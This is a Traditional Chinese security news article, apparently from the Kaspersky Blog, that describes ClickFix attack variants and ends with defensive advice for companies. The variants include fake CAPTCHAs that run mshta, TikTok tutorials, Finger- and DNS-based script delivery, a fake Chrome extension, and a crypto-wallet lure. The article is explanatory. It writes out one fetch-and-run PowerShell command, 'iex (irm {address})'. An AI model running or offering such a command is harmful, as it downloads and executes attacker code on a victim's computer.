ClickFix技術在過去一年持續進化,不但逐漸被攻擊者廣泛使用,而且使用的技倆也推陳出新,不再單純訛稱執行指令解決問題或通過驗證碼,惡意內容也出現新變種,大家應該特別注意。
使用mshta.exe
去年Microsoft專家公開一份關於網絡攻擊針對與Booking.com合作的酒店業主,攻擊者透過服務發送假通知或電郵吸引注意力,兩種個案的電郵都含有連件指向假Booking.com,要求受害者在Run選單執行程式碼以證明他們不是機械人。這種攻擊與ClickFix有兩個主要分別,第一個是用戶沒有被要求複製字串,惡意網站會複製到交換緩衝區,可能是在用戶點擊假裝成reCAPTCHA機制時發生。第二個是惡意字串呼喚mshta.exe程序,它被用於運行用HTML編寫的應用程式,也會連接到攻擊者的伺服器執行惡意內容。
TikTok影片和管理員特權PowerShell
在2025年10月有文章揭露透過TikTok影片指示散播惡意程式,影片內容偽裝成免費啟動軟件的教學,並要求以管理員權限執行PowerShell,然後執行指令iex (irm {address}),irm指令從攻擊者控制的伺服器下載惡意腳本,然後iex下令執行,腳本便會在受害者的電腦下載盜竊資料的惡意程式。
使用Finger協議
另一個不常見的ClickFix變種攻擊使用常見的驗證碼技倆,但惡意腳本則使用過時的Finger協議,同名工具讓任何人請求遠端伺服器上特定用戶的資料,雖然協議歷史久遠,但仍被Windows、macOS和部份Liux為基礎的系統。用戶會被遊說打開命令界面然後執行指令經由Finger與攻擊者的伺服器進行連線,協議只傳輸文字資訊,但足以下載其他腳本到受害者的電腦然後安裝惡意程式。
CrashFix變種
另一個ClickFix變種使用更加精密的社交工程,專門針對正在尋找攔截廣告橫帳、追蹤、惡意程式或網頁上不受歡迎內容的工具,在Google Chrome搜尋擴充插件時,受害者會找到NexShield – Advanced Web Guardian,其實只是一個真實軟件的複製品,但在某些位置會把瀏覽器崩潰,再影示假通知偵測到安全性問題,需要執行「掃描」修復錯誤,如果用戶同意,便會收到指示如何打開Run選單,然後執行擴充插件事前複製到剪貼板的指令。指令複製finger.exe到暫存資料夾,更改名稱為ct.exe,然後以攻擊者的地址執行,透過Finger協議傳輸惡意腳本,它會啟動和安裝遙距存取木馬ModelRAT。
透過DNS查詢傳播惡意程式
一款比平常ClickFix更加複雜的變種,不過研究人員沒有披露社交工程使用的技倆,攻擊者為了增加企業環境中攻擊的偵測難度,延長惡意基礎架構的壽命,增加額外步驟,聯絡攻擊者控制的DNS伺服器。在受害者被遊說複製和執行惡意指令,會以用戶的身份通過合法nslookup工具向DNS伺服器發送請求,指令含有攻擊者控制的特定DNS伺服器地址,獲得的回應是惡意腳本,可以下載惡意內容。
加密貨幣誘餌和JavaScript
含有多階段社交工程的變種,在Pastebin的評論中,攻擊者積極散播關於Swapzone.io加密貨幣交易所存在漏洞的消息,加密貨幣持有者會被邀請前往由騙徒創建的資源,當中含有使用該安全漏洞的指引,可以在數天內獲得1.3萬美元。指引解釋如何使用服務漏洞以更優惠匯率兌換加密貨幣,要求受害者在Chrome瀏覽器打開服務的網站,手動於網址欄輸入「javascript:」,然後複製並執行攻擊者網站提供的JavsScript腳本,實際上是替換Bitcoin錢包地址,如果受害者嘗試兌換貨幣,交易資金會全部傳入攻擊者帳號。
企業如何防範ClickFix
應對ClickFix最簡單的方法是封鎖Win + R快捷鍵,不過隨著變種出現,要求用戶自行執行惡意程式碼已經不是唯一的攻擊方法,所以提升員工的網絡安全意識十分重要,清楚明白被要求對系統進行不尋常操作,或從某處複製貼上程式碼,另外,我們還建議:
- 在所有企業裝置使用可靠的防護
- 使用XDR方案監察公司網絡內的可疑活動
- 如內部資源有限,可使用外部服務進行偵測和回應
資料來源:Kaspersky Blog
